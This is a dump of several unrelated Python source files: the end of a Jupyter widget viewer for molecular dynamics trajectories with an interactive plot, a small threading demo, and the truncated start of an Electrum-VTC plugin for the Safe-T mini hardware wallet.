layout=wg.Layout(display='none'))
self._Color_green = wg.ToggleButton(value=False, description='Green', button_style='',
layout=wg.Layout(display='none'))
self._Color_cyan = wg.ToggleButton(value=False, description='Cyan', button_style='',
layout=wg.Layout(display='none'))
self._Color_blue = wg.ToggleButton(value=False, description='Blue', button_style='',
layout=wg.Layout(display='none'))
self._Color_purple = wg.ToggleButton(value=False, description='Purple', button_style='',
layout=wg.Layout(display='none'))
self._Color_magenta = wg.ToggleButton(value=False, description='Magenta', button_style='',
layout=wg.Layout(display='none'))
self._Color_black = wg.ToggleButton(value=False, description='Black', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_80 = wg.ToggleButton(value=False, description='Grey 80', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_60 = wg.ToggleButton(value=False, description='Grey 60', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_40 = wg.ToggleButton(value=False, description='Grey 40', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_20 = wg.ToggleButton(value=False, description='Grey 20', button_style='',
layout=wg.Layout(display='none'))
self._Color_white = wg.ToggleButton(value=False, description='White', button_style='',
layout=wg.Layout(display='none'))
self._Color_baw = wg.ToggleButton(value=False, description='B/W', button_style='',
layout=wg.Layout(display='none'))
self._Color_rainbow = wg.ToggleButton(value=False, description='Rainbow', button_style='',
layout=wg.Layout(display='none'))
# dict: remember representation of component 0
self._dict_Component_0 = {'Cartoon': True,
'BaS': False,
'Surface': False,
'Visibility': True,
'Color_Scheme': 'rainbow'}
# dict: remember representation of component 1
self._dict_Component_1 = {'Cartoon': True,
'BaS': False,
'Surface': False,
'Visibility': True,
'Color_Scheme': 'rainbow'}
# list: remember last chosen component
self._track_Components = ['Component 0']
# make widgets interactive
def switch_FrameTime(a):
"""
switch <iPlayer_object>.widgets.FrameTime description beetween:
- <iPlayer_object>.widgets.Frame.description
- <iPlayer_object>.widgets.Time.description
"""
if 'Frame' in self.FrameTime.description:
self.FrameTime.description = self.Time.description
else:
self.FrameTime.description = self.Frame.description
self.FrameTime.on_click(switch_FrameTime)
def update_FrameTime(args):
"""
Update <iPlayer_object>.widgets.FrameTime.description
"""
frame = args['new']
time = int(frame * iPlayer_cls.universe.trajectory.dt) # time in ps
if 'Frame' in self.FrameTime.description:
self.FrameTime.description = 'Frame: {}'.format(frame)
else:
self.FrameTime.description = 'Time: {} ps'.format(time)
iPlayer_cls.player.observe(update_FrameTime, 'frame')
def update_Frame(args):
"""
Update <iPlayer_object>.widgets.Frame.description
"""
frame = args['new']
self.Frame.description = 'Frame: {}'.format(frame)
iPlayer_cls.player.observe(update_Frame, 'frame')
def update_Time(args):
"""
Update <iPlayer_object>.widgets.Time.description
"""
frame = args['new']
time = int(frame * iPlayer_cls.universe.trajectory.dt) # time in ps
self.Time.description = 'Time: {} ps'.format(time)
iPlayer_cls.player.observe(update_Time, 'frame')
def copy_Frame(a):
"""
Copy frame of <iPlayer_object>.widgets.Frame.description on clickinng the button.
"""
self.Frame.value = False
a = str(self.Frame.description.split(': ')[-1])
pyperclip.copy(a)
wg.interactive(copy_Frame, a=self.Frame)
def copy_Time(a):
"""
Copy time of <iPlayer_object>.widgets.Time.description on clicking the button.
"""
self.Time.value = False
a = str(self.Time.description.split(': ')[-1])
pyperclip.copy(a)
wg.interactive(copy_Time, a=self.Time)
def reset_view(a):
"""
Reset camera view orientation (center+rotate).
"""
self.Reset.value = False
# iPlayer_cls.player.center() #camera orientation is already centered
iPlayer_cls.player._set_camera_orientation(iPlayer_cls.player._camera_orientation_at_start)
wg.interactive(reset_view, a=self.Reset)
def toggle_Visibility(a):
"""
Toggle Representation -> Visibility of components.
"""
if self.Components.description == 'Component 0' and a == True:
iPlayer_cls.player.component_0.show()
if self.Components.description == 'Component 0' and a == False:
iPlayer_cls.player.component_0.hide()
if self.Components.description == 'Component 1' and a == True:
iPlayer_cls.player.component_1.show()
if self.Components.description == 'Component 1' and a == False:
iPlayer_cls.player.component_1.hide()
wg.interactive(toggle_Visibility, a=self._Visibility)
def dropdown_Components(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Components button.
"""
if self.Components.value:
self._Component_0.layout = wg.Layout(display='visible')
else:
self._Component_0.layout = wg.Layout(display='none')
wg.interactive(dropdown_Components, a=self.Components)
# mimic layout of _Component_0 button
wg.jsdlink((self._Component_0, 'layout'), (self._Component_1, 'layout'))
def dropdown_Representation(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Representations button.
"""
if self.Representation.value:
self._Cartoon.layout = wg.Layout(display='visible')
else:
self._Cartoon.layout = wg.Layout(display='none')
return
wg.interactive(dropdown_Representation, a=self.Representation)
# mimic layout of Cartoon button
wg.jsdlink((self._Cartoon, 'layout'), (self._BaS, 'layout'))
wg.jsdlink((self._Cartoon, 'layout'), (self._Surface, 'layout'))
wg.jsdlink((self._Cartoon, 'layout'), (self._Visibility, 'layout'))
def dropdown_Color(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Color button.
"""
if self.Color.value:
self._Color_red.layout = wg.Layout(display='visible')
else:
self._Color_red.layout = wg.Layout(display='none')
return
wg.interactive(dropdown_Color, a=self.Color)
# mimic layout of Color_red button
wg.jsdlink((self._Color_red, 'layout'), (self._Color_orange, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_yellow, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_green, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_cyan, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_blue, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_purple, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_magenta, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_black, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_80, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_60, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_40, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_20, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_white, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_baw, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_rainbow, 'layout'))
# toggle UI (method is defined below in iWidgets class)
# mimic layout of Hide/Show UI button
wg.jsdlink((self.Representation, 'layout'), (self.Color, 'layout'))
wg.jsdlink((self.Representation, 'layout'), (self.Color_by_RES, 'layout'))
wg.jsdlink((self.Representation, 'layout'), (self.Components, 'layout'))
wg.interactive(self.toggle_UI, a=self.UI)
def update_PlayerStep(step):
"""
Update step/speed of <iPlayer_object>.widgets.PlayerStep.
"""
iPlayer_cls.player.player.step = step
return
wg.interactive(update_PlayerStep, step=self.PlayerStep)
def update_Components(a):
"""
Update <iPlayer_object>.widgets.Components.
"""
if self._Component_0.value:
self._Component_0.value = False
self.Components.description = 'Component 0'
elif self._Component_1.value:
self._Component_1.value = False
self.Components.description = 'Component 1'
if self.Components.description == 'Component 0'\
and self.Components.description != self._track_Components[-1]:
# set dict values
self._dict_Component_1['Cartoon'] = self._Cartoon.value
self._dict_Component_1['BaS'] = self._BaS.value
self._dict_Component_1['Surface'] = self._Surface.value
self._dict_Component_1['Visibility'] = self._Visibility.value
# load dict values
self._track_Components.append(self.Components.description)
self._Cartoon.value = self._dict_Component_0['Cartoon']
self._BaS.value = self._dict_Component_0['BaS']
self._Surface.value = self._dict_Component_0['Surface']
self._Visibility.value = self._dict_Component_0['Visibility']
elif self.Components.description == 'Component 1'\
and self.Components.description != self._track_Components[-1]:
# set dict values
self._dict_Component_0['Cartoon'] = self._Cartoon.value
self._dict_Component_0['BaS'] = self._BaS.value
self._dict_Component_0['Surface'] = self._Surface.value
self._dict_Component_0['Visibility'] = self._Visibility.value
# load dict values
self._track_Components.append(self.Components.description)
self._Cartoon.value = self._dict_Component_1['Cartoon']
self._BaS.value = self._dict_Component_1['BaS']
self._Surface.value = self._dict_Component_1['Surface']
self._Visibility.value = self._dict_Component_1['Visibility']
else: # todo: Distances code
pass
return
wg.interactive(update_Components, a=self._Component_0)
wg.interactive(update_Components, a=self._Component_1)
def update_Representation(Cartoon, BaS, Surface):
"""
Updates representation via add/remove command.
Colors the representation by looking up the color scheme in hidden dictionary.
Args:
Cartoon (bool)
BaS (bool)
Surface (bool)
"""
if iPlayer_cls.widgets.Components.description == 'Component 0':
iPlayer_cls.player.component_0.clear_representations()
if Cartoon:
iPlayer_cls.player.component_0.add_cartoon(selection="protein rna", color="green")
if BaS:
iPlayer_cls.player.component_0.add_ball_and_stick(selection="all")
if Surface:
iPlayer_cls.player.component_0.add_surface(selection="protein rna", color='blue',
wireframe=True, opacity=0.2, isolevel=3.)
cs = iPlayer_cls.widgets._dict_Component_0['Color_Scheme']
iPlayer_cls.color.set_color_scheme(cs)
if iPlayer_cls.widgets.Components.description == 'Component 1':
iPlayer_cls.player.component_1.clear_representations()
if Cartoon:
iPlayer_cls.player.component_1.add_cartoon(selection="protein rna", color="green")
if BaS:
iPlayer_cls.player.component_1.add_ball_and_stick(selection="all")
if Surface:
iPlayer_cls.player.component_1.add_surface(selection="protein rna", color='blue',
wireframe=True, opacity=0.2, isolevel=3.)
cs = iPlayer_cls.widgets._dict_Component_1['Color_Scheme']
iPlayer_cls.color.set_color_scheme(cs)
return
wg.interactive(update_Representation, Cartoon=self._Cartoon, BaS=self._BaS,
Surface=self._Surface)
def update_Color(a):
"""
Update color of representation.
"""
# simple color schemes
if self._Color_red.value:
self._Color_red.value = False
iPlayer_cls.color.set_color_scheme('red')
if self._Color_orange.value:
self._Color_orange.value = False
iPlayer_cls.color.set_color_scheme('orange')
if self._Color_yellow.value:
self._Color_yellow.value = False
iPlayer_cls.color.set_color_scheme('yellow')
if self._Color_green.value:
self._Color_green.value = False
iPlayer_cls.color.set_color_scheme('green')
if self._Color_cyan.value:
self._Color_cyan.value = False
iPlayer_cls.color.set_color_scheme('cyan')
if self._Color_blue.value:
self._Color_blue.value = False
iPlayer_cls.color.set_color_scheme('blue')
if self._Color_purple.value:
self._Color_purple.value = False
iPlayer_cls.color.set_color_scheme('purple')
if self._Color_magenta.value:
self._Color_magenta.value = False
iPlayer_cls.color.set_color_scheme('magenta')
if self._Color_black.value:
self._Color_black.value = False
iPlayer_cls.color.set_color_scheme('black')
if self._Color_grey_80.value:
self._Color_grey_80.value = False
iPlayer_cls.color.set_color_scheme('grey_80')
if self._Color_grey_60.value:
self._Color_grey_60.value = False
iPlayer_cls.color.set_color_scheme('grey_60')
if self._Color_grey_40.value:
self._Color_grey_40.value = False
iPlayer_cls.color.set_color_scheme('grey_40')
if self._Color_grey_20.value:
self._Color_grey_20.value = False
iPlayer_cls.color.set_color_scheme('grey_20')
if self._Color_white.value:
self._Color_white.value = False
iPlayer_cls.color.set_color_scheme('white')
# complex color schemes
if self._Color_baw.value:
self._Color_baw.value = False
iPlayer_cls.color.set_color_scheme('b/w')
if self._Color_rainbow.value:
self._Color_rainbow.value = False
iPlayer_cls.color.set_color_scheme('rainbow')
return
wg.interactive(update_Color, a=self._Color_red)
wg.interactive(update_Color, a=self._Color_orange)
wg.interactive(update_Color, a=self._Color_yellow)
wg.interactive(update_Color, a=self._Color_green)
wg.interactive(update_Color, a=self._Color_cyan)
wg.interactive(update_Color, a=self._Color_blue)
wg.interactive(update_Color, a=self._Color_purple)
wg.interactive(update_Color, a=self._Color_magenta)
wg.interactive(update_Color, a=self._Color_black)
wg.interactive(update_Color, a=self._Color_grey_80)
wg.interactive(update_Color, a=self._Color_grey_60)
wg.interactive(update_Color, a=self._Color_grey_40)
wg.interactive(update_Color, a=self._Color_grey_20)
wg.interactive(update_Color, a=self._Color_white)
wg.interactive(update_Color, a=self._Color_baw)
wg.interactive(update_Color, a=self._Color_rainbow)
def click_Color_by_RES(a):
"""
Color by RES / Apply 'rainbow' color scheme on representation.
"""
self.Color_by_RES.value = False
iPlayer_cls.color.set_color_scheme('rainbow')
wg.interactive(click_Color_by_RES, a=self.Color_by_RES)
return
def __repr__(self):
return "<iWidgets Class>"
def toggle_UI(self, a=None):
"""
Toggle UI with a=True/False. If a=None, then UI will switch to other state.
"""
if a == True and self.UI.value == False:
self.UI.description = 'True'
elif a == False and self.UI.value == False:
self.UI.description = 'False'
if self.UI.description == 'Show UI' or self.UI.description == 'True':
self.UI.value = False
self.UI.description = 'Hide UI'
self.Components.layout = wg.Layout(width='148px', display='visible')
self.Representation.layout = wg.Layout(display='visible')
elif self.UI.description == 'Hide UI' or self.UI.description == 'False':
self.UI.value = False
self.UI.description = 'Show UI'
self.Components.layout = wg.Layout(display="none")
self.Representation.layout = wg.Layout(display='none')
self._Cartoon.layout = wg.Layout(display='none')
self._Color_red.layout = wg.Layout(display='none')
self._Component_0.layout = wg.Layout(display='none')
# change values of dropdown menus after toggle
self.Components.value = False
self.Representation.value = False
self.Color.value = False
return
class iPlayer(object):
def __init__(self, universe=None):
"""
init iPlayer
- if universe is PDB ID (str with len = 4) -> fetch online
- if universe is path (str with len > 4) -> create universe
- if universe is universe -> pass universe
"""
# case 1: input is PDB ID -> fetch online
if type(universe) is str and len(universe) == 4:
self.universe = mda.fetch_mmtf(universe)
self.player = ngl.show_mdanalysis(self.universe)
# case 2: input is path -> create MDA Universe
elif type(universe) is str and len(universe) > 4:
self.universe = mda.Universe(universe)
self.player = ngl.show_mdanalysis(self.universe)
# case 3: input is MDA Universe
else:
self.universe = universe
self.player = ngl.show_mdanalysis(self.universe)
self.player._camera_orientation_at_start = None
self.color = iColor(self)
self.widgets = iWidgets(self)
self.widgets.toggle_UI(False)
self._init_Representation()
return
def __call__(self, layout='default'):
"""
Show trajectory viewer with GUI.
Args:
layout (str):
| 'default': default layout
| 'every other str': non-default layout
.. Note:: Alternatively execute show_player() method by calling the object.
Example:
| tv = core.iPlayer(<universe>)
| tv() # short version of tv.show_player()
"""
self.show_player(layout)
return
def __repr__(self):
return('''iPlayer object:\n {}\n <Trajectory with {} frames>\n <{}>'''.format(
self.universe, len(self.universe.trajectory), self.player))
def _init_Representation(self):
"""
Init representation
"""
self.color.set_color_scheme('rainbow')
return
def _save_camera_orientation(self):
time.sleep(1)
if self.player._camera_orientation_at_start == None:
self.player._camera_orientation_at_start = self.player._camera_orientation
return
def _update_player_layout(self, layout='default'):
"""
update player layout
"""
self.player._layout = layout # needed for show_plot() function
self.widgets.YValue.layout = wg.Layout(display='none')
if '+' in layout:
self.widgets.YValue.layout = wg.Layout(display='visible')
return
def sync_view(self):
"""
Alias for <iPlayer_object>.player.sync_view().
"""
self.player.sync_view()
return
def show_player(self, layout='default'):
"""
Show trajectory viewer with GUI.
Args:
layout (str):
| 'default': default layout
| 'Marie': special layout for special person
Alternative:
Execute show_player() method by calling the object.
Example:
tv = core.iPlayer(<universe>)
tv() # short version of tv.show_player()
"""
if 'Marie' in layout:
tv_and_widgets = wg.VBox([wg.HBox([self.widgets.FrameTime, self.widgets.YValue]),
self.player,
wg.HBox([self.widgets.Reset, self.widgets.UI, self.widgets.PlayerStep]),
wg.HBox([wg.VBox([self.widgets.Components,
self.widgets._Component_0,
self.widgets._Component_1]),
wg.VBox([self.widgets.Representation,
self.widgets._Cartoon,
self.widgets._BaS,
self.widgets._Surface,
self.widgets._Visibility]),
wg.VBox([self.widgets.Color,
self.widgets._Color_red,
self.widgets._Color_orange,
self.widgets._Color_yellow,
self.widgets._Color_green,
self.widgets._Color_cyan,
self.widgets._Color_blue,
self.widgets._Color_purple,
self.widgets._Color_magenta]),
wg.VBox([self.widgets.Color_by_RES,
self.widgets._Color_black,
self.widgets._Color_grey_80,
self.widgets._Color_grey_60,
self.widgets._Color_grey_40,
self.widgets._Color_grey_20,
self.widgets._Color_white,
self.widgets._Color_baw,
self.widgets._Color_rainbow])
])
])
else:
tv_and_widgets = wg.VBox([self.player,
wg.HBox([self.widgets.FrameTime, self.widgets.YValue, self.widgets.Reset, self.widgets.UI, self.widgets.PlayerStep]),
wg.HBox([wg.VBox([self.widgets.Components,
self.widgets._Component_0,
self.widgets._Component_1]),
wg.VBox([self.widgets.Representation,
self.widgets._Cartoon,
self.widgets._BaS,
self.widgets._Surface,
self.widgets._Visibility]),
wg.VBox([self.widgets.Color,
self.widgets._Color_red,
self.widgets._Color_orange,
self.widgets._Color_yellow,
self.widgets._Color_green,
self.widgets._Color_cyan,
self.widgets._Color_blue,
self.widgets._Color_purple,
self.widgets._Color_magenta]),
wg.VBox([self.widgets.Color_by_RES,
self.widgets._Color_black,
self.widgets._Color_grey_80,
self.widgets._Color_grey_60,
self.widgets._Color_grey_40,
self.widgets._Color_grey_20,
self.widgets._Color_white,
self.widgets._Color_baw,
self.widgets._Color_rainbow])
])
])
self._update_player_layout(layout)
display(tv_and_widgets)
t = threading.Thread(target=self._save_camera_orientation)
t.start()
return
class iPlot(iPlayer):
def __init__(self, universe=None, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5), layout='default'):
"""
Init iPlot.
"""
super().__init__(universe)
self.widgets.toggle_UI(False)
self.xdata = np.array(xdata)
self.ydata = np.array(ydata)
# figure properties
self.fig = lambda: None # create function object
self.fig.xlabel = xlabel
self.fig.ylabel = ylabel
self.fig.title = title
self.fig.tu = tu
self.fig.figsize = figsize
# Marie stuff start (interactive widgets)
self._update_player_layout(layout)
def update_YValue_description(args):
"""
Update <iPlayer_object>.widgets.YValue.description
"""
frame = args['new']
# if len(ydata) == len(frames)
if frame < len(self.ydata):
yvalue = self.ydata[frame]
else:
yvalue = self.ydata[-1]
self.widgets.YValue.description = '{}: {}'.format(self.fig.ylabel.split(" ")[0], round(yvalue, 5))
self.player.observe(update_YValue_description, 'frame')
def find_Min(a):
"""
Find and jump to global minimum in xy-Plot
"""
Xmin = self.xdata[np.argmin(self.ydata)]
self.player.frame = int(round(Xmin/self.universe.trajectory.dt))
self.widgets.YValue.on_click(find_Min)
# Marie stuff end (interactive widgets)
return
def __call__(self, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5), layout='default'):
"""
Show trajectory viewer with GUI and interactive matplotlib plot.
Interactive red bar can be moved by pressing any key.
Args:
xdata (array)
ydata (array)
xlabel (str)
ylabel (str)
title (str)
tu (str):
| time unit of plot. Either 'ps', 'ns' or 'frame'.
| If 'ns' is selected, time stamps of MDAnalysis universe are converted from ps to ns.
| Important to make the interactive red bar work properly.
figsize (tuple)
layout (str):
| 'default': default layout
| 'every other str': non-default layout
.. Note:: Alternatively execute show_plot() method by calling the object.
Example:
| ip = core.iPlot(<universe>)
| ip() # short version of ip.show_plot()
"""
# special case: make the call Q('kw-layout') work as Q(layout='kw-layout')
if type(xdata) is str:
layout = xdata
self._update_player_layout(layout)
self._update_fig_properties(xlabel, ylabel, title, tu, figsize)
self.show_player(layout)
if xdata != None and ydata != None:
self.show_plot(xdata, ydata, self.fig.xlabel, self.fig.ylabel, self.fig.title, self.fig.tu, self.fig.figsize)
else:
self.show_plot(self.xdata, self.ydata, self.fig.xlabel, self.fig.ylabel, self.fig.title, self.fig.tu, self.fig.figsize)
return
def __repr__(self):
return('''iPlot object:\n {}\n <Trajectory with {} frames>\n <{}>\n <{} data points>'''.format(
self.universe, len(self.universe.trajectory), self.player, len(self.xdata)))
def _update_fig_properties(self, xlabel='X', ylabel='Y', title='', tu='ps', figsize=(8, 4.5), smartlabel=True):
"""
update fig properties
"""
default = {'xlabel': 'X',
'ylabel': 'Y',
'title': '',
'tu': 'ps',
'figsize': (8, 4.5)}
if xlabel != default['xlabel']:
self.fig.xlabel = xlabel
if ylabel != default['ylabel']:
self.fig.ylabel = ylabel
if title != default['title']:
self.fig.title = title
if tu != default['tu']:
self.fig.tu = tu
if figsize != default['figsize']:
self.fig.figsize = figsize
# extra: smartlabel (change tu and label)
if smartlabel == True and self.fig.xlabel == default['xlabel']:
if self.fig.tu == 'frame':
self.fig.xlabel = 'Frame'
elif self.fig.tu == 'ps':
self.fig.xlabel = 'Time (ps)'
elif self.fig.tu == 'ns':
self.fig.xlabel = 'Time (ns)'
if smartlabel == True and 'frame' in self.fig.xlabel.lower():
self.fig.tu = 'frame'
if smartlabel == True and self.fig.ylabel == default['ylabel']:
self.fig.ylabel = 'RMSD'
return
def show_plot(self, xdata=None, ydata=None, xlabel='X', ylabel='Y', title='',
tu='ps', figsize=(8, 4.5)):
"""
Show trajectory viewer with GUI and interactive matplotlib plot.
Interactive red bar can be moved by pressing any key.
Args:
xdata (array)
ydata (array)
xlabel (str)
ylabel (str)
title (str)
tu (str):
| time unit of plot. Either 'ps', 'ns' or 'frame'.
| If 'ns' is selected, time stamps of MDAnalysis universe are converted from ps to ns.
| Important to make the interactive red bar work properly.
figsize (tuple)
.. Note:: Alternatively execute show_plot() method by calling the object.
Example:
| ip = core.iPlot(<universe>)
| ip() # short version of ip.show_plot()
"""
self._update_player_layout(self.player._layout)
self._update_fig_properties(xlabel, ylabel, title, tu, figsize)
# assign values
if np.all(xdata) != None and np.all(ydata) != None:
self.xdata = np.array(xdata)
self.ydata = np.array(ydata)
# assign pseudo values for testing (if no values assigned yet)
if np.all(self.xdata) == None and np.all(self.ydata) == None:
print("No data specified. Using pseudo values for figure.\
\nJump to a frame/move the interactive red bar by holding any key and pressing LMB.")
if self.fig.tu == 'frame':
self.xdata = np.linspace(self.universe.trajectory[0].frame,
self.universe.trajectory[-1].frame,
100)
else:
self.xdata = np.linspace(self.universe.trajectory[0].time,
self.universe.trajectory[-1].time,
100)
self.ydata = np.random.uniform(low=0.0, high=5.0, size=(100,))
# plot
self.fig.fig = plt.figure(figsize=figsize)
self.ax = self.fig.fig.add_subplot(111)
if self.fig.tu == 'ps':
# self.ax.plot(self.xdata, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self.xdata, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self.xdata, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self.xdata[0], color="red", lw=2) # redline
plt.xlim(self.xdata[0], self.xdata[-1])
except TypeError or IndexError:
pass
if self.fig.tu == 'ns':
self._xdata_ns = 0.001 * self.xdata
# self.ax.plot(self._xdata_ns, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self._xdata_ns, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self._xdata_ns, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self._xdata_ns[0], color="red", lw=2) # redline
plt.xlim(self._xdata_ns[0], self._xdata_ns[-1])
except TypeError or IndexError:
pass
if self.fig.tu == 'frame':
self._xdata_frame = np.arange(0, len(self.xdata))
# self.ax.plot(self._xdata_frame, self.ydata, 'b.', ms=1, lw=None)
self.ax.plot(self._xdata_frame, self.ydata, color=cp[0], alpha=0.85, lw=2)
self.ax.fill_between(self._xdata_frame, self.ydata, color=cp[0], alpha=0.15)
try:
plt.axvline(x=self._xdata_frame[0], color="red", lw=2) # redline
plt.xlim(self._xdata_frame[0], self._xdata_frame[-1])
except TypeError or IndexError:
pass
plt.xlabel(self.fig.xlabel)
plt.ylabel(self.fig.ylabel)
if self.fig.title != '':
plt.title(self.fig.title, fontweight="bold")
plt.ylim(0,)
sns.despine(offset=0)
plt.tight_layout()
# make fig interactive
self._event = lambda: None
self._event.key_is_held = False
def hold_key(event):
self._event.key_is_held = True
return
self.fig.fig.canvas.mpl_connect('key_press_event', hold_key)
def release_key(event):
self._event.key_is_held = False
return
self.fig.fig.canvas.mpl_connect('key_release_event', release_key)
def onclick_goto_FRAME(event):
"""
Click behavior for tu='frame'.
"""
if self._event.key_is_held and self.fig.tu == 'frame':
self.player.frame = int(round(event.xdata))
return
self.fig.fig.canvas.mpl_connect('button_press_event', onclick_goto_FRAME)
def onclick_goto_TIME(event):
"""
Click behavior for tu='ps' and tu='ns'.
"""
if self._event.key_is_held and self.fig.tu == 'ps':
self.player.frame = int(round(event.xdata / self.universe.trajectory.dt))
elif self._event.key_is_held and self.fig.tu == 'ns':
self.player.frame = int(round(1000 * event.xdata / self.universe.trajectory.dt))
return
self.fig.fig.canvas.mpl_connect('button_press_event', onclick_goto_TIME)
def draw_redbar(args):
"""
Draw red bar in interactive matplotlib based on current frame/time of trajectory viewer.
"""
frame = args['new']
del self.ax.lines[-1]
if self.fig.tu == 'frame':
self.ax.axvline(x=frame, color="red", lw=2)
elif self.fig.tu == 'ps':
time = frame * self.universe.trajectory.dt
self.ax.axvline(x=time, color="red", lw=2)
elif self.fig.tu == 'ns':
time = 0.001 * frame * self.universe.trajectory.dt
self.ax.axvline(x=time, color="red", lw=2)
return
self.player.observe(draw_redbar, 'frame')
return
|
misc1.py
|
from threading import Thread
lx = 0
def function():
while True:
global lx # We are referring to the globally assigned variable.
lx+=1
#return lx
def function1():
while True:
global lx # We are referring to the globally assigned variable.
print(lx)
Thread(target=function).start()
Thread(target=function1).start()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_vtc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_vtc.bip32 import BIP32Node
from electrum_vtc import constants
from electrum_vtc.i18n import _
from electrum_vtc.plugin import Device, runs_in_hwd_thread
from electrum_vtc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_vtc.keystore import Hardware_KeyStore
from electrum_vtc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
